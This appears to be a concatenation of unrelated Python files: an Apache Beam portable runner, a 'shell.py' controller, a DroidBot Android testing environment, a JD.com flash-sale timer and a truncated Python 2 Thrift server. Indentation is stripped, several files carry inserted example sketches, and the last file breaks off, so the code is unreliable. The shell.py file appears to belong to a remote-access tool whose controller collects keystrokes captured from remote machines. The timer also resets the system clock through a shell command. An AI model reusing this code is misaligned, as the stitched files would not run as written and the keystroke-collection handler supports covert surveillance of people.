from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
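# Illustrative sketch (not part of Beam): driving a JobServiceHandle directly,
# mirroring the prepare -> stage -> run flow described in the class docstring.
# `job_service_stub` is assumed to be an already-connected JobService gRPC stub,
# `options` a PipelineOptions instance and `proto_pipeline` an already-built
# beam_runner_api_pb2.Pipeline.
def _example_submit(job_service_stub, options, proto_pipeline):  # pragma: no cover
  handle = JobServiceHandle(job_service_stub, options)
  job_id, message_stream, state_stream = handle.submit(proto_pipeline)
  return job_id, message_stream, state_stream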
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
    # Eventually remove the 'pre_optimize' option altogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (ie Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
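# Illustrative sketch (not part of Beam): running a small pipeline against an
# external job service via the PortableRunner. The endpoint value and the use
# of the LOOPBACK environment are assumptions chosen only for the example.
def _example_portable_run():  # pragma: no cover
  import apache_beam as beam
  from apache_beam.options.pipeline_options import PipelineOptions
  opts = PipelineOptions([
      '--runner=PortableRunner',
      '--job_endpoint=localhost:8099',
      '--environment_type=LOOPBACK',
  ])
  # The context manager waits for the job to finish, as the log message in
  # run_pipeline() above recommends.
  with beam.Pipeline(options=opts) as p:
    _ = p | 'Create' >> beam.Create([1, 2, 3])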
|
shell.py
|
# Date: 06/05/2018
# Author: Pure-L0G1C
# Description: Recv/Send to master
import sys
import time
from queue import Queue
from threading import Thread, RLock
class Shell(object):
def __init__(self, sess_obj, interface):
self.interface = interface
self.keylogging = False
self.keystrokes = None
self.sess = sess_obj
self.is_alive = True
self.recv = Queue()
self.lock = RLock()
def start(self):
t1 = Thread(target=self.listen)
t2 = Thread(target=self.recv_manager)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
t1.join()
t2.join()
def listen(self):
while self.is_alive:
recv = self.sess.recv()
if recv:
self.recv.put(recv)
else:
self.is_alive = False
self.interface.disconnect_client(self.sess)
def recv_manager(self):
while self.is_alive:
if self.recv.qsize():
with self.lock:
recv = self.recv.get()
if recv['code'] == -0:
self.keystrokes = recv['args']
self.display_text('Data: {}'.format(recv['args']))
def send(self, code=None, args=None):
self.sess.send(code=code, args=args)
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
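# Illustrative sketch (not part of this tool): wiring up a Shell. It assumes a
# session object exposing send()/recv() and an interface object exposing
# disconnect_client(), which is how Shell uses them above; the code/args values
# are made up for the example.
def _example_shell(sess, interface):  # pragma: no cover
    shell = Shell(sess, interface)
    shell.send(code=1, args='ls')  # forwarded to sess.send(...)
    shell.start()  # blocks: spawns the listen and recv-manager threads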
|
env.py
|
import argparse
import logging
import os
import sys
import random
import time
from datetime import datetime
import gym
from gym import spaces, logger
from gym.utils import seeding
import numpy as np
from droidbot import Device, App
from droidbot.rl.observation import Observation
from droidbot.rl.action import Action
from droidbot import monitor
from droidbot.rl.RL_test import DQN
class TestEnv(gym.Env):
"""
Description:
        An app under test is running on an Android device.
The agent will observe:
1. the UI
2. the current process status, e.g. listening broadcast receivers,
recently executed APIs, recently printed logs, etc.
The agent can interact with the device by:
1. sending a gesture
2. sending a broadcast intent
3. pressing a key
The goal is to trigger as many sensitive behaviors in the app as possible in one episode.
Observation: defined in observation.py
Action: defined in action.py
Reward:
Reward is 1 for every sensitive behavior detected.
A sensitive behavior is uniquely identified based on the API name (and the stack trace?).
Starting State:
All initial observations are obtained right after the app is installed and started.
Episode Termination:
Step limit is exceeded.
Timeout.
"""
metadata = {
'episode.step_limit': 200, # maximum number of steps in an episode
'episode.timeout': 600, # maximum duration of an episode
'step.n_events': 1, # number of events per step
'step.wait': 0, # time in seconds to wait after each input event
}
def __init__(self, apk_dir, device_serial=None, output_dir='output'):
self.logger = logging.getLogger('TestEnv')
self.observation_space = Observation.get_space()
self.action_space = Action.get_space()
self.seed_ = self.seed()
self.viewer = None
        # added by wangsonghe
self.current_app = None
self.monitor_thread = None
self.device = Device(device_serial=device_serial, output_dir=output_dir)
self.apk_files = self._get_apk_files(apk_dir)
self.output_dir = output_dir
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self, app_idx=None):
"""
reset the current environment by starting the app on the device
:return: the initial observation
"""
# make sure the device is connected
self.device.wait_for_device()
self._close_episode()
# get a random app as the current app
if app_idx is None:
app_idx = self.np_random.randint(0, len(self.apk_files))
self.current_app = App(self.apk_files[app_idx])
self.executed_APIs = []
self.sensitive_behaviors = []
self.n_steps = 0
self.start_time = datetime.now()
self.running = True
self.observation = Observation(self.device, self.current_app)
#wsh
# install the current app
self.device.install_app(self.current_app)
import threading
self.monitor_thread = threading.Thread(target=self._monitor_APIs)
self.monitor_thread.start()
# start the current app on the device
self.device.start_app(self.current_app)
time.sleep(3)
self.device.droidbot_app.connect()
# get current observation
return self.observation.observe(self)
def render(self, mode='human'):
if mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
print(self.device.get_current_state().to_dict())
#self.viewer.imshow(self.device.get_current_state())
return self.viewer.isopen
def step(self, action):
n_events = self.metadata['step.n_events']
n_existing_sensitive_behaviors = len(self.sensitive_behaviors)
event_generator = Action.get_event_generator(action)
for i in range(n_events):
event = event_generator.gen_event()
self.device.send_event(event)
time.sleep(self.metadata['step.wait'])
obs = self.observation.observe(self)
self.executed_APIs = [] # reset interested_apis list
time.sleep(2) #wait for monitor
reward = len(self.sensitive_behaviors) - n_existing_sensitive_behaviors
done = False
if self.n_steps > self.metadata['episode.step_limit']:
done = True
elif (datetime.now() - self.start_time).total_seconds() > self.metadata['episode.timeout']:
done = True
info = {} # put any useful information in this dict
return obs, reward, done, info
def close(self):
self.reset()
self.device.disconnect()
pass
def _get_apk_files(self, apk_dir):
apk_files = []
for dir_path, dir_names, file_names in os.walk(apk_dir):
for file_name in file_names:
if file_name.lower().endswith('.apk'):
apk_files.append(os.path.join(dir_path, file_name))
return apk_files
def _close_episode(self):
# uninstall the current app
self.running = False
if self.current_app is not None:
self.device.uninstall_app(self.current_app)
if self.monitor_thread is not None:
# wait for the monitor thread to finish
time.sleep(1)
def _monitor_APIs(self):
# TODO @Songhe monitor the app and maintain self.executed_APIs and self.sensitive_behaviors
self.monitor = monitor.Monitor()
self.monitor.serial = self.device.serial
self.monitor.packageName = self.current_app.get_package_name()
self.monitor.set_up()
while self.running:
self.monitor.check_env()
time.sleep(5)
self.sensitive_behaviors += self.monitor.get_sensitive_api()
self.executed_APIs = self.monitor.get_interested_api()
pass
self.monitor.stop()
def parse_args():
"""
Parse command line input
:return:
"""
parser = argparse.ArgumentParser(description="DroidBot RL environment.")
parser.add_argument("-a", action="store", dest="apk_dir", required=True,
help="The directory of apps to test")
parser.add_argument("-d", action="store", dest="device_serial", required=False, default=None,
help="The serial number of target device (use `adb devices` to find)")
parser.add_argument("-o", action="store", dest="output_dir",
help="directory of output")
args, unknown = parser.parse_known_args()
return args
def main():
args = parse_args()
env = TestEnv(apk_dir=args.apk_dir, device_serial=args.device_serial)
env.reset()
for _ in range(100):
# env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
# dqn_agent = DQN(env, time_steps=4)
# dqn_agent.train(max_episodes=50)
if __name__ == '__main__':
main()
|
timer.py
|
# -*- coding:utf-8 -*-
# import gevent
# from gevent import monkey; monkey.patch_all()
import threading
import json
import os
import platform
import random
import time
from datetime import datetime, timedelta
import requests
from log import logger
class Timer(object):
def __init__(self, buy_time, sleep_interval=1, fast_sleep_interval=0.01, is_sync=True, assistant=None):
        # Synchronize with JD's server time
if is_sync is True:
Timer.setSystemTime()
# '2018-09-28 22:45:50.000'
self.buy_time = datetime.strptime(buy_time, "%Y-%m-%d %H:%M:%S.%f")
self.fast_buy_time = self.buy_time + timedelta(seconds=-3)
self.concurrent_time = self.buy_time + timedelta(seconds=-20)
self.connect_time = self.buy_time + timedelta(seconds=-45)
self.sleep_interval = sleep_interval
self.fast_sleep_interval = fast_sleep_interval
self.buy_time_timestamp = self.buy_time.timestamp()
self.fast_buy_time_timestamp = self.fast_buy_time.timestamp()
self.concurrent_time_timestamp = self.concurrent_time.timestamp()
self.connect_time_timestamp = self.connect_time.timestamp()
self.is_connected = False
self.now_time = time.time
self.assistant = assistant
self.fast_mode = assistant.config.fast_mode
if self.fast_mode:
assistant.make_seckill_connect()
def start(self):
        logger.info('Waiting for the scheduled time: %s' % self.buy_time)
check_timestamp = None
assistant = self.assistant
buy_time_timestamp = self.buy_time.timestamp()
fast_buy_time_timestamp = self.fast_buy_time_timestamp
concurrent_time_timestamp = self.concurrent_time_timestamp
connect_time_timestamp = self.connect_time_timestamp
fast_sleep_interval = self.fast_sleep_interval
sleep_interval = self.sleep_interval
while True:
now = self.now_time()
if now > buy_time_timestamp:
                # Past the deadline: execute in the main thread, without concurrency
                logger.info('Scheduled time has passed, executing now')
self.assistant.start_func()
return None
                # Temporary change: concurrency is enabled by default
# break
else:
if now > fast_buy_time_timestamp:
if self.is_connected:
time.sleep(fast_sleep_interval)
# else:
# if now_time() > connect_time_timestamp and sock_conn_func is not None:
# if self.fast_mode:
# assistant.connect_now()
# self.is_connected = True
elif now > concurrent_time_timestamp:
                    logger.info('Approaching the scheduled time, starting %s-way concurrent countdown', assistant.concurrent_count)
break
elif now > connect_time_timestamp:
if not self.is_connected and self.fast_mode:
assistant.connect_now()
self.is_connected = True
else:
time.sleep(sleep_interval)
else:
                    # Keep-alive check
if self.fast_mode:
if check_timestamp is None:
check_timestamp = now + 1800 + random.randint(-10, 10)
elif now > check_timestamp:
if assistant._validate_cookies() is True:
check_timestamp = None
logger.info("账户在线状态检查正常")
else:
logger.error("账户已离线,请重新登录!")
exit(-1)
time.sleep(sleep_interval)
        # Start coroutines (gevent variant, disabled)
# for i in range(assistant.concurrent_count):
# assistant.concurrent_gevent_array.append(gevent.spawn(self.ready_call))
# gevent.joinall(assistant.concurrent_gevent_array)
        # Start threads
thread_list = []
for i in range(assistant.concurrent_count):
t = threading.Thread(target=self.ready_call)
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def ready_call(self):
while True:
now = self.now_time()
if now > self.buy_time_timestamp:
                logger.info('Scheduled time reached, executing now')
self.assistant.start_func()
break
else:
if self.is_connected:
time.sleep(self.fast_sleep_interval)
# else:
# if now_time() > connect_time_timestamp and sock_conn_func is not None:
# if self.fast_mode:
# self.is_connected = True
# self.assistant.connect_now()
@staticmethod
def setSystemTime():
url = 'https://api.m.jd.com/client.action?functionId=queryMaterialProducts&client=wh5'
try:
session = requests.session()
# get server time
t0 = datetime.now()
ret = session.get(url).text
t1 = datetime.now()
if not ret:
                logger.error('Failed to sync JD server time: the time-sync endpoint is no longer available')
return
js = json.loads(ret)
t = float(js["currentTime2"]) / 1000
dt = datetime.fromtimestamp(t) + ((t1 - t0) / 2)
sys = platform.system()
if sys == "Windows":
import win_util
win_util.setWinSystemTime(dt)
elif sys == "Linux":
os.system(f'date -s "{dt.strftime("%Y-%m-%d %H:%M:%S.%f000")}"')
            logger.info('Synchronized with JD server time: %s' % dt)
except Exception as e:
            logger.error('Failed to sync JD server time, please check permissions')
logger.error(e)
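# Illustrative sketch (not part of this script): constructing a Timer with a
# minimal stand-in assistant. The assistant attributes used here
# (config.fast_mode, concurrent_count, start_func) are the ones Timer relies on
# above; their values are assumptions for the example.
class _FakeConfig(object):
    fast_mode = False
class _FakeAssistant(object):
    config = _FakeConfig()
    concurrent_count = 1
    def start_func(self):
        logger.info('start_func called')
def _example_timer():  # pragma: no cover
    timer = Timer('2030-01-01 10:00:00.000', is_sync=False, assistant=_FakeAssistant())
    timer.start()  # blocks until the configured time, then calls start_func()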
|
TServer.py
|
#!/usr/bin/env python
#
# Copyright (c) 2006- Facebook
# Distributed under the Thrift Software License
#
# See accompanying file LICENSE or visit the Thrift site at:
# http://developers.facebook.com/thrift/
import sys
import traceback
import threading
import Queue
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
class TServer:
"""Base interface for a server, which must have a serve method."""
""" 3 constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)"""
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
